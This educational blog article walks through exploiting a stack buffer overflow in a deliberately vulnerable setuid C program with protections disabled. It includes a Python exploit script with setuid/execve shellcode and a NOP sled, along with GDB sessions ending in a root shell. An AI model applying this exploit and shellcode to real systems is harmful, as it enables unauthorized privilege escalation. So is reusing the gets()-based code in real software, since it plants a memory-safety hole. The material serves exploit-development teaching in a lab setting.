Buffer Overflow - Shellcode

Introduction

In my article on Introduction to Buffer Overflow, we explored exploiting a Buffer Overflow vulnerability to commandeer the instruction pointer. This led us to redirect the program's execution flow to a different function not originally called within our program.

However, since it was a basic illustration of Buffer Overflow, we didn't achieve anything with real impact. Today, we'll delve into the Shellcode technique, focusing on exploiting a buffer overflow to gain system access or potentially escalate privileges.

What is Shellcode?

Shellcode is a small piece of code typically written in assembly language that is injected into a vulnerable program's memory during a buffer overflow attack. This code is designed to exploit the vulnerability and execute specific actions, often granting the attacker unauthorized access to the system or allowing them to execute arbitrary commands. Shellcode is called "shellcode" because it commonly spawns a command shell (such as a Unix shell or a Windows command prompt) for the attacker to interact with, hence giving them control over the compromised system.

Shellcode in Stack-Based Buffer Overflow

Exploiting a Buffer Overflow with shellcode involves overwriting the saved return address (the value later loaded into the Instruction Pointer) so that it points to a location on the stack where the malicious instructions were placed.

As you have seen in the Introduction to Buffer Overflow article, when you overflow the stack, you commonly reach the return address. This address was pushed onto the stack when the vulnerable function was called, and it is where the program resumes after executing the ret instruction. Through the buffer overflow, the attacker modifies this address to set the Instruction Pointer to any address they want, thereby controlling the program flow.

When the attacker aims to exploit this technique, they create a malicious payload that overwrites the return address with one specified by the attacker, while also embedding crafted shellcode onto the stack. The altered return address directs the program execution flow to the beginning of the shellcode, strategically placed by the attacker on the stack. This necessitates that the attacker possess knowledge of stack addresses before finalizing their payload.

Let's see this graphically:

I'll explain this image so that you can understand the attack representation well.

On the left, there are decimal numbers representing memory addresses within the stack. The word "data" signifies random data stored on the stack.

On the right, there are texts, each indicating a section on the stack containing the described data. For instance, the text "user input" points to the section on the stack where user input is stored.

The decimal numbers stored within the stack, such as the one pointed to by the text "Return Address", are also memory addresses. In the case of "return address", it holds the memory address (10) to which the program will return.

Let's see what happens if the user enters a large string:

As you can see, the stack has been overflowed, including important saved values such as the Return Address and the Saved EBP. Now, if the function returns, meaning the ret instruction is executed and pops the saved return address into the Instruction Pointer, the program will attempt to jump to the memory address 0x41414141 (the bytes of the string "AAAA" in hexadecimal), which will inevitably crash the program.
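To make the overwrite concrete, here is a toy model in Python. It is only a sketch: the 8-byte buffer, the frame layout (buffer, then saved EBP, then return address) and both saved values are made-up assumptions for illustration, not values read from a real process.

```python
import struct

BUFFER_SIZE = 8  # toy buffer size (assumption, smaller than a real one)

def build_frame() -> bytearray:
    """Build a toy stack frame: buffer | saved EBP | return address."""
    frame = bytearray(BUFFER_SIZE + 8)
    struct.pack_into("<I", frame, BUFFER_SIZE, 0xFFFFD0C8)      # hypothetical saved EBP
    struct.pack_into("<I", frame, BUFFER_SIZE + 4, 0x080491F6)  # hypothetical return address
    return frame

def unchecked_copy(frame: bytearray, data: bytes) -> None:
    """Copy data to the start of the frame with no bounds check, like gets()."""
    frame[0:len(data)] = data

def return_address(frame: bytearray) -> int:
    """Read the 4-byte little-endian return address stored after the saved EBP."""
    return struct.unpack_from("<I", frame, BUFFER_SIZE + 4)[0]

frame = build_frame()
print(hex(return_address(frame)))   # the original (hypothetical) return address

unchecked_copy(frame, b"A" * 16)    # 8 bytes fill the buffer, 8 more spill over
print(hex(return_address(frame)))   # 0x41414141
```

The second value is what ret would load into the Instruction Pointer: four "A" bytes interpreted as an address.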

Once the attacker realizes they can overwrite the return address with a custom one, they should assess which protections the binary incorporates. Exploiting a buffer overflow using shellcode requires that the NX (No eXecute) protection be disabled. Remember that NX protection prevents certain memory regions, such as the stack, from being executed as instructions. In this scenario, the attacker controls the stack. If the attacker redirects the return address to a location on the stack where they've placed malicious instructions, and the NX protection is disabled, those instructions will be executed. Otherwise, if the NX protection is enabled, those instructions won't execute, and the program will crash.
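One way to check this particular protection is to read the PT_GNU_STACK program header of the ELF file, whose flags record whether the stack is requested as executable. The following is a minimal sketch, assuming a 32-bit little-endian ELF file. The function name stack_is_executable and the path ./program are illustrative choices, and readelf -l reports the same information.

```python
import struct
from typing import Optional

PT_GNU_STACK = 0x6474E551  # program header type that describes stack permissions
PF_X = 0x1                 # "executable" bit in the p_flags field

def stack_is_executable(elf: bytes) -> Optional[bool]:
    """Return True/False from PT_GNU_STACK, or None if the header is absent."""
    if elf[:4] != b"\x7fELF" or elf[4] != 1 or elf[5] != 1:
        raise ValueError("expected a 32-bit little-endian ELF file")
    (e_phoff,) = struct.unpack_from("<I", elf, 0x1C)             # program header table offset
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 0x2A)  # entry size and count
    for index in range(e_phnum):
        base = e_phoff + index * e_phentsize
        (p_type,) = struct.unpack_from("<I", elf, base)
        (p_flags,) = struct.unpack_from("<I", elf, base + 24)
        if p_type == PT_GNU_STACK:
            return bool(p_flags & PF_X)
    return None

if __name__ == "__main__":
    try:
        with open("./program", "rb") as handle:  # hypothetical path to the target binary
            print("executable stack:", stack_is_executable(handle.read()))
    except (OSError, ValueError) as error:
        print("could not inspect ./program:", error)
```

A result of True means NX does not protect the stack of that binary, which is the precondition for the technique described here.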

In the event the NX protection is disabled, the attacker should do the following:

First, they have to understand the layout of the stack, including the offset at which the return address is overwritten and where their shellcode ends up on the stack. Once they identify where the shellcode begins, they need to write that address over the return address. This way, when the function returns, the malicious address is loaded into the Instruction Pointer, and the program flow continues from the beginning of the shellcode.

Let's see this process graphically:

As observed, the attacker successfully overflowed the stack. They created a carefully designed payload to overwrite the return address with the address 36 and then to place the shellcode on the stack. Now, when the function returns, the program flow will continue from address 36, which indeed holds the beginning of the shellcode on the stack.

Practice

Let's attempt to exploit a buffer overflow by abusing this technique. Since this is a simple demonstration of how attackers can exploit a buffer overflow using shellcode, we'll disable every binary protection to make it simpler.

Firstly, let's disable the ASLR protection:

root@ubuntu$ echo 0 > /proc/sys/kernel/randomize_va_space

You can re-enable it later by either writing "2" to that file or restarting the system.
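If you want to confirm the current setting before continuing, a small Python sketch like the one below can read it back. The helper names describe_aslr and current_aslr are my own, and the descriptions summarize the three values documented for this kernel setting.

```python
from pathlib import Path

# Meaning of the values accepted by /proc/sys/kernel/randomize_va_space
ASLR_MODES = {
    "0": "disabled",
    "1": "partial (stack, mmap base, vDSO and shared libraries)",
    "2": "full (partial plus heap)",
}

def describe_aslr(raw: str) -> str:
    """Translate the raw file content into a human-readable mode."""
    return ASLR_MODES.get(raw.strip(), "unknown")

def current_aslr(path: str = "/proc/sys/kernel/randomize_va_space") -> str:
    """Read the setting, or report that it is unavailable (e.g. not on Linux)."""
    try:
        return describe_aslr(Path(path).read_text())
    except OSError:
        return "unavailable"

print("ASLR:", current_aslr())
```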

C Program:

#include <stdio.h>
#include <stdlib.h>

// Compile: gcc program.c -o program -no-pie -fno-stack-protector -z execstack -m32

void vulnFunction(){

  char username[20];  // fixed-size buffer stored on the stack

  printf("Please, enter your username: ");
  gets(username);     // no bounds check: longer input overflows the buffer

  printf("Hello, %s", username);

}

int main(){
  vulnFunction();
  return 0; 
}

Let's compile it using gcc:

elswix@ubuntu$ gcc program.c -o program -no-pie -fno-stack-protector -z execstack -m32

Let's switch the ownership of this file to root and set it as Set-UID. This way, we can later elevate privileges when exploiting it:

elswix@ubuntu$ sudo chown root:root program
elswix@ubuntu$ sudo chmod u+s program

Once the program is ready, let's execute it:

elswix@ubuntu$ ./program
Please, enter your username: elswix
Hello, elswix

As you can see, the program asks for a username and then prints it back to the stdout.

Let's see what happens if we enter a very large string in order to trigger a buffer overflow.

elswix@ubuntu$ ./program
Please, enter your username: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
zsh: segmentation fault (core dumped)  ./program
elswix@ubuntu$

As observed, the program has crashed. This indicates that we overflowed the stack and overwrote the return address, causing the program to attempt to return to an address such as 0x41414141 (the string "AAAA" in hexadecimal), which of course it couldn't.

Let's use gdb to perform a thorough examination of the program's behavior:

elswix@ubuntu$ gdb -q program
GEF for linux ready, type `gef' to start, `gef config' to configure
88 commands loaded and 5 functions added for GDB 12.1 in 0.00ms using Python engine 3.10
Reading symbols from program...
(No debugging symbols found in program)
gef$

By the way, I'm using the GDB Enhanced Features (GEF) extension for GDB, as it provides enhancements to the original GDB.

Let's execute this program using the gdb command run, and then enter a large string:

gef$ run
Starting program: /home/elswix/Desktop/elswix/Local/bufferoverflow-article/shellcode/program 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Please, enter your username: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
gef$

As observed, our string has overwritten several registers, including the Instruction Pointer. This is because we overflowed the stack, where the function saves the previous values of some registers. When the function returns, those saved values are popped back into the registers, so the registers end up holding user-controlled data.

The most interesting value to overwrite is the return address, since when the function returns, this value is popped into the EIP register, allowing us to control the Instruction Pointer, and consequently, the program flow.

So far, we know that we can control the instruction pointer by overwriting the return address on the stack. However, we don't know how many characters we have to enter before we start overwriting the return address. As explained in my Introduction to Buffer Overflow article, an attacker could create a pattern string. Then, when it overwrites the return address, they can examine the value of the instruction pointer and compare it with their pattern string to determine where the overwrite occurred.

For instance, imagine the attacker enters a string like this:

AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMM

This is a pattern string. When you enter it and the program tries to return to an address like 0x49494949, you'll notice that the return address was overwritten where the characters IIII were entered. This helps you identify where to place malicious addresses to control the program flow.
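The lookup described above can be sketched in a few lines of Python. The helper names make_pattern and offset_of are hypothetical, and the crash address 0x49494949 is the example value from the paragraph above.

```python
import string
import struct

def make_pattern(groups: int) -> bytes:
    """Build AAAABBBBCCCC... with one 4-byte group per uppercase letter."""
    return "".join(letter * 4 for letter in string.ascii_uppercase[:groups]).encode()

def offset_of(pattern: bytes, crashed_eip: int) -> int:
    """Find where the 4 bytes that ended up in EIP sit inside the pattern (-1 if absent)."""
    needle = struct.pack("<I", crashed_eip)  # EIP value back to its in-memory byte order
    return pattern.find(needle)

pattern = make_pattern(13)
print(pattern.decode())                # AAAABBBB...MMMM
print(offset_of(pattern, 0x49494949))  # 32
```

Because every 4-byte group is unique, the position of the group found in EIP is exactly the number of bytes that precede the return address.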

GEF contains a useful tool to automate this process. Firstly, let's create a pattern with the command pattern create:

gef$ pattern create 100
[+] Generating a pattern of 100 bytes (n=4)
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa
[+] Saved as '$_gef1'
gef$

Then, let's execute the program and enter the generated string as input:

gef$ run
Starting program: /home/elswix/Desktop/elswix/Local/bufferoverflow-article/shellcode/program 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Please, enter your username: aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa

Program received signal SIGSEGV, Segmentation fault.
0x61616169 in ?? ()
gef$

As you can see, the instruction pointer (EIP) holds the value 0x61616169 (the string "iaaa" stored in little-endian byte order). This indicates that the return address was overwritten by the iaaa portion of our pattern.

Since we entered the pattern generated by GEF, we can use the command pattern offset $eip to calculate how many characters are required before the return address is overwritten:

gef$ pattern offset $eip
[+] Searching for '69616161'/'61616169' with period=4
[+] Found at offset 32 (little-endian search) likely
gef$

As observed, we need to enter 32 characters before overwriting the return address.
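GEF's output mentions two search strings because it tries both byte orders. As a rough illustration (not GEF's actual implementation), the same check can be done by hand on the pattern generated earlier:

```python
import struct

# The 100-byte pattern produced by "pattern create 100" above
pattern = (b"aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaap"
           b"aaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa")
eip = 0x61616169  # value of EIP at the crash

little = struct.pack("<I", eip)  # bytes as stored in memory on x86: b"iaaa"
big = struct.pack(">I", eip)     # the other candidate GEF considers: b"aaai"

print(little, pattern.find(little))  # b'iaaa' 32
print(big, pattern.find(big))        # b'aaai' 29
```

x86 is little-endian, so the first result is the relevant one, which matches the offset of 32 that GEF marks as likely.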

Let's verify if this is true by creating a string of 32 'A' characters followed by 4 'B' characters:

gef$ run <<< $(python -c 'print("A"*32 + "B"*4)')

Starting program: /home/elswix/Desktop/elswix/Local/bufferoverflow-article/shellcode/program <<< $(python -c 'print("A"*32 + "B"*4)')
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
gef$

It worked! We overwrote the EIP with the string "BBBB". This indicates that we need to enter 32 bytes (characters) before overwriting the return address.

To successfully exploit this buffer overflow using shellcode, we first need to determine where to place it. Since we control the stack, we can position it there and redirect the instruction pointer to the start of our shellcode.

In theory, once the function returns, the stack pointer should point to the data we insert into our payload after the return address. To verify this, let's add some data after the return address:

python -c 'print("A"*32 + "B"*4 + "C"*16)'

gef$ run <<< $(python -c 'print("A"*32 + "B"*4 + "C"*16)')
Starting program: /home/elswix/Desktop/elswix/Local/bufferoverflow-article/shellcode/program <<< $(python -c 'print("A"*32 + "B"*4 + "C"*16)')
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()

As evident, the stack pointer now points to the data we entered after the return address. Consequently, we can copy the stack pointer address and use it as the return address. Thus, when the function returns, the instruction pointer will point to that stack address, where our "C" characters are located.

Why do this? Well, when compiling the binary we disabled the NX (No eXecute) protection, which leaves regions such as the stack executable. By injecting malicious instructions (shellcode) into the stack and directing the instruction pointer to this specific area, those instructions will be executed, leading to code execution.

As depicted in the image, the stack pointer address was 0xffffcfa0, pointing to our C characters placed after the return address. This indicates that we can redirect the instruction pointer to this address, allowing us to insert our malicious instructions (shellcode) in place of those C characters. Therefore, when the instruction pointer reaches these instructions, they will be executed.

To verify the execution of malicious instructions inserted on the stack, I'll use INT 3 instructions.

The INT 3 instruction is a software interrupt primarily used for debugging. When executed, it triggers an interrupt, typically causing the program to halt and transfer control to a debugger. This enables developers to inspect the program's state, memory, and execution flow at that point. It's commonly used for setting breakpoints in code to facilitate debugging.

This means that when the instruction pointer reaches an INT 3 instruction, the CPU raises a breakpoint trap. Under GDB, the program stops with a SIGTRAP signal, just as if we had set a breakpoint there, which tells us that our bytes were actually executed.

The payload is constructed as follows:

python -c 'import sys; sys.stdout.buffer.write(b"A"*32 + b"\xa0\xcf\xff\xff" + b"\xCC"*12)'

Let's break down this payload step by step.

Firstly, we're using sys.stdout.buffer.write to print non-printable bytes, a technique I explained in detail in my article on Introduction to Buffer Overflow.

The payload starts with 32 filler characters, which fill the buffer and everything else up to the return address. Then, we insert the address 0xffffcfa0 in little-endian format. This address points to the stack immediately following the return address, where we previously placed our "C" characters. By inserting this address as the return address, the program will resume execution from 0xffffcfa0 when the function returns.

After the return address, we add 12 INT 3 (\xCC) instructions. These instructions are placed on the stack. As a result, when the function returns to 0xffffcfa0, the instruction pointer will point to this address, initiating the execution of the instructions on the stack.

If the exploitation is successful, the program flow will resume from the address 0xffffcfa0 on the stack, where our INT 3 instructions are located.
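If writing the address bytes in reverse by hand feels error-prone, Python's struct module can do the little-endian conversion. This short sketch rebuilds the same payload as the one-liner above; the variable names are only illustrative.

```python
import struct

return_address = 0xFFFFCFA0                  # stack address observed in GDB
packed = struct.pack("<I", return_address)   # "<I" = 4-byte little-endian unsigned integer

payload = b"A" * 32 + packed + b"\xCC" * 12  # filler + return address + INT 3 bytes

print(packed.hex())   # a0cfffff
print(len(payload))   # 48
```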

Let's execute the program and enter our payload:

gef$ run <<< $(python -c 'import sys; sys.stdout.buffer.write(b"A"*32 + b"\xa0\xcf\xff\xff" + b"\xCC"*12)')
Starting program: /home/elswix/Desktop/elswix/Local/bufferoverflow-article/shellcode/program <<< $(python -c 'import sys; sys.stdout.buffer.write(b"A"*32 + b"\xa0\xcf\xff\xff" + b"\xCC"*12)')
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGTRAP, Trace/breakpoint trap.
0xffffcfa1 in ?? ()
gef$

Great! The execution has now reached our INT 3 instructions, as indicated by the message "Trace/breakpoint trap", and GDB has halted the program. Note that EIP reads 0xffffcfa1 rather than 0xffffcfa0: INT 3 is a one-byte instruction and the trap is reported after it executes, so EIP already points at the next byte. Essentially, we're executing the instructions we placed on the stack by controlling the instruction pointer and directing it to them.

So far, we achieved execution of controlled instructions. Now, let's try to escalate our privileges and get a shell as the root user.

Given that the binary is setuid, the process runs with the effective user ID of the binary's owner, which in this case is root, so our injected instructions run with those privileges too. To gain root-level execution, we have two options: creating our own shellcode or utilizing pre-existing shellcode developed by others. The latter approach is often preferred as it allows us to utilize shellcode that has been tested and proven to work reliably.

There are websites, such as Shell-Storm, which offer pre-created shellcode, enabling us to execute commands and perform various tasks. My objective is to execute a shellcode that grants me a root shell, essentially executing the following code:

execve("/bin/sh",0,0);

As the binary is setuid and owned by root, one might assume that executing this call would grant us a root shell. However, it's not that simple. Before spawning a shell as the root user (/bin/sh), we need to call setuid(0) to set all user IDs to root. This step is necessary even though the program runs with the effective user ID (EUID) of root, because its real user ID is still ours. For a deeper understanding of why this is essential, I recommend reading my article on Understanding Linux User IDs.

In this scenario, there's no issue with using the setuid() function, as there are pre-created shellcodes available that incorporate it before employing execve() to launch /bin/sh. For this purpose, I've selected the following shellcode:

char shellcode[] =
                                // <_start>:
    "\x31\xdb"                  // xor    %ebx,%ebx
    "\x6a\x17"                  // push   $0x17
    "\x58"                      // pop    %eax
    "\xcd\x80"                  // int    $0x80
    "\xf7\xe3"                  // mul    %ebx
    "\xb0\x0b"                  // mov    $0xb,%al
    "\x31\xc9"                  // xor    %ecx,%ecx
    "\x51"                      // push   %ecx
    "\x68\x2f\x2f\x73\x68"      // push   $0x68732f2f
    "\x68\x2f\x62\x69\x6e"      // push   $0x6e69622f
    "\x89\xe3"                  // mov    %esp,%ebx
    "\xcd\x80"                  // int    $0x80
;
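Before using bytes like these, it helps to sanity-check them. The sketch below makes two checks under my own assumptions: it decodes the two pushed constants to confirm they spell the shell path, and it looks for bytes that commonly break delivery (a newline would make gets() stop reading, and NUL bytes are usually avoided as well).

```python
import struct

# Same 28 bytes as the listing above
shellcode = (
    b"\x31\xdb\x6a\x17\x58\xcd\x80"  # ebx = 0, eax = 0x17 (setuid), int 0x80
    b"\xf7\xe3\xb0\x0b\x31\xc9\x51"  # mul zeroes eax/edx, al = 0xb (execve), ecx = 0, push 0
    b"\x68\x2f\x2f\x73\x68"          # push 0x68732f2f
    b"\x68\x2f\x62\x69\x6e"          # push 0x6e69622f
    b"\x89\xe3\xcd\x80"              # ebx = esp (pointer to the path), int 0x80
)

# The last push ends up at the lowest address, so it comes first in memory
path = struct.pack("<II", 0x6E69622F, 0x68732F2F)

BAD_BYTES = {0x00, 0x0A}  # NUL and newline (assumed problematic for this delivery method)
found = sorted(byte for byte in set(shellcode) if byte in BAD_BYTES)

print(len(shellcode))  # 28
print(path)            # b'/bin//sh'
print(found)           # []
```

The doubled slash in /bin//sh is harmless to the kernel and pads the path to exactly eight bytes, so it fits in two 4-byte pushes.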

For convenience, I've opted to create a Python script to generate our payload:

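import sys

offset = 32                # bytes of input before the saved return address
junk = b"A"*offset         # filler that reaches the return address

EIP = b"\xa0\xcf\xff\xff"  # 0xffffcfa0 in little-endian: start of the shellcode on the stack

buf = b""

# Shellcode: setuid(0) followed by execve("/bin//sh")
# https://shell-storm.org/shellcode/files/shellcode-516.html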

buf += b"\x31\xdb"                  # xor    %ebx,%ebx
buf += b"\x6a\x17"                  # push   $0x17
buf += b"\x58"                      # pop    %eax
buf += b"\xcd\x80"                  # int    $0x80
buf += b"\xf7\xe3"                  # mul    %ebx
buf += b"\xb0\x0b"                  # mov    $0xb,%al
buf += b"\x31\xc9"                  # xor    %ecx,%ecx
buf += b"\x51"                      # push   %ecx
buf += b"\x68\x2f\x2f\x73\x68"      # push   $0x68732f2f
buf += b"\x68\x2f\x62\x69\x6e"      # push   $0x6e69622f
buf += b"\x89\xe3"                  # mov    %esp,%ebx
buf += b"\xcd\x80"                  # int    $0x80


payload = junk + EIP + buf


sys.stdout.buffer.write(payload)

When running the program again and providing our new payload containing the shellcode, everything executes correctly:

gef$ run <<< $(python bofexploit.py)
Starting program: /home/elswix/Desktop/elswix/Local/bufferoverflow-article/shellcode/program <<< $(python bofexploit.py)
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

process 21752 is executing new program: /usr/bin/dash

[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[Inferior 1 (process 21752) exited normally]
gef$

Indeed, as seen in GDB, the execve() function was executed as expected. Of course, all of this occurred within GDB. Now, let's observe what happens when the program runs outside of GDB:

elswix@ubuntu$ ./program <<< $(python bofexploit.py)
zsh: segmentation fault (core dumped)  ./program <<< $(python bofexploit.py)

That's not what I expected. Why didn't it work?

This is because stack addresses outside of GDB differ from those inside it. But why, if we disabled ASLR? Actually, it's not a problem of randomization; it's a matter of what is stored on the stack. As you may know, the stack also holds the environment variables when a program starts, and outside of GDB they may differ, which shifts our payload to other addresses. Other data on the stack can affect those addresses as well.

To address this issue, we have a couple of options. One approach is to use env -i when executing the program, which clears all environment variables, preventing the stack from being populated with them. Another method is to use NOPs (No Operation) to pad the payload.

NOP (no operation) instructions perform no action, as implied by their name. This makes them particularly valuable in shellcode exploits, because execution simply falls through to the next instruction. By inserting NOPs in front of our shellcode and directing the EIP (instruction pointer) to the middle of them, the processor will keep executing no-operations until it reaches our intended shellcode. This approach provides a wider margin for error: if the payload ends up a few bytes higher or lower than expected, the only difference is how many NOP instructions get executed. This technique of padding with NOPs is commonly referred to as a NOP slide or NOP sled, as the EIP effectively "slides" down these no-operation instructions.

Let's modify our script:

import sys 


offset = 32
junk = b"A"*offset

EIP = 0xffffcfa0+300             # guessed address: 300 bytes above the one seen in GDB
EIP = EIP.to_bytes(4, "little")  # pack it as 4 little-endian bytes


...[snip]...
payload = junk + EIP + b"\x90"*100 + buf  # 100-byte NOP sled in front of the shellcode
sys.stdout.buffer.write(payload)

I've made two changes. First, I adjusted the return address: I added 300 bytes to the stack address observed in GDB because, outside of GDB, the environment variables differ and the payload ends up at a different address. With the original value, the instruction pointer would not reach our payload, since that address is too low outside of GDB. Second, I added a 100-byte NOP sled in front of the shellcode because, even after adding 300 bytes, we can't be certain where exactly the shellcode starts. If the return address lands anywhere in the sled, execution slides through the NOPs into the shellcode.
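The margin for error that the sled buys can be worked out with simple arithmetic. In the sketch below, the shift values are hypothetical: they stand for how far the payload might sit from its GDB address when the program runs outside the debugger, which is exactly the quantity we don't know in advance.

```python
GDB_PAYLOAD_START = 0xFFFFCFA0                # where the bytes after the return address sat in GDB
RETURN_ADDRESS = GDB_PAYLOAD_START + 300      # the guess used in the script
SLED_LENGTH = 100                             # number of NOP bytes before the shellcode

def lands_on_sled(return_address: int, sled_start: int, sled_length: int) -> bool:
    """True if execution starts on a NOP or exactly on the first shellcode byte."""
    return sled_start <= return_address <= sled_start + sled_length

for shift in (0, 150, 200, 250, 300, 350):    # hypothetical stack shifts outside GDB
    sled_start = GDB_PAYLOAD_START + shift
    print(shift, lands_on_sled(RETURN_ADDRESS, sled_start, SLED_LENGTH))
```

With these numbers the guess succeeds for any shift between 200 and 300 bytes. A longer sled widens that window, while a guess that lands below the sled or in the middle of the shellcode fails.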

Now, when executing it, no errors are encountered.

elswix@ubuntu$ ./program <<< $(python bofexploit.py)
elswix@ubuntu$

But why didn't we obtain a shell with "/bin/sh"? Well, there's an explanation for this. I found this Stack Overflow question which explains this behavior. The problem is that the program's standard input ends right after our payload, so the spawned shell reads end-of-file immediately and exits. The solution is to use cat:

"This way you ensure that your program's standard input doesn't end after what echo outputs. Instead, cat continues to supply input to your program. The source of that subsequent input is your terminal since this is where cat reads from."

Let's test to see if it works:

elswix@ubuntu$ (python bofexploit.py; cat) | ./program
whoami
whoami
root
id
uid=0(root) gid=1000(elswix) groups=1000(elswix),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),135(lxd),136(sambashare)
^C
elswix@ubuntu$

It worked! We've successfully achieved command execution as root, effectively exploiting the buffer overflow vulnerability.
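To see why the earlier here-string attempt returned straight to the prompt, the end-of-input behavior can be reproduced without any exploit. This is a small sketch assuming a POSIX system with /bin/sh available; run_shell is a hypothetical helper that starts a shell whose entire standard input is the bytes we pass.

```python
import subprocess

def run_shell(stdin_data: bytes) -> bytes:
    """Start /bin/sh with stdin_data as its whole standard input and return its stdout."""
    result = subprocess.run(["/bin/sh"], input=stdin_data,
                            stdout=subprocess.PIPE, check=False)
    return result.stdout

print(run_shell(b""))           # stdin is already at end-of-file: the shell just exits
print(run_shell(b"echo hi\n"))  # a command is waiting on stdin, so the shell runs it
```

Keeping cat attached to the pipe plays the role of the second call: it keeps feeding the shell whatever we type instead of letting it hit end-of-file.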

Conclusion

In conclusion, the Shellcode technique is very useful when exploiting buffer overflows, provided that the NX protection is disabled. However, in the wild, binaries without NX are not that common, so in those cases you should opt for other techniques.

In upcoming articles, we'll delve into bypassing protections such as ASLR and NX, involving the Return to Libc technique. Additionally, I'll create an article where we'll develop our own shellcode and return to this program to try it out.

I hope you learned something new from this article.

Happy Hacking!

References

https://ir0nstone.gitbook.io/notes/types/stack/nops

https://ir0nstone.gitbook.io/notes/types/stack/no-execute

https://ir0nstone.gitbook.io/notes/types/stack/shellcode

https://ir0nstone.gitbook.io/notes/types/stack/aslr

https://elswix.github.io/articles/5/introduction-to-buffer-overflow.html

https://elswix.github.io/articles/4/binary-protections.html

https://elswix.github.io/articles/3/cpu-and-assembly-binexp-basics.html

https://elswix.github.io/articles/understanding-linux-user-ids.html

https://shell-storm.org/shellcode/files/shellcode-516.html

https://shell-storm.org/shellcode/index.html

https://stackoverflow.com/questions/8509045/execve-bin-sh-0-0-in-a-pipe